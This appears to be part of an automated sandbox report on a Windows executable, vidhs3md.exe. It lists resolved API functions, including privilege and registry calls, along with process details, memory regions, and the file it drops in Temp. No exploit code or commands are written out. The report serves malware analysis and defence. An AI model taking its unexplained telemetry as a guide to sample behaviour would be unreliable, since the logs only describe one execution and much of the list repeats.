| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x74731580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x74731500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x74731560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:37 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #157: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #157 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:05:00, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb30 |
| Parent PID | 0xf4c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B28
0x
6D8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00707fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x00710000 | 0x00739fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x00900fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x01d0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x01e8ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74550000 | 0x745e1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74730000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x74730000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
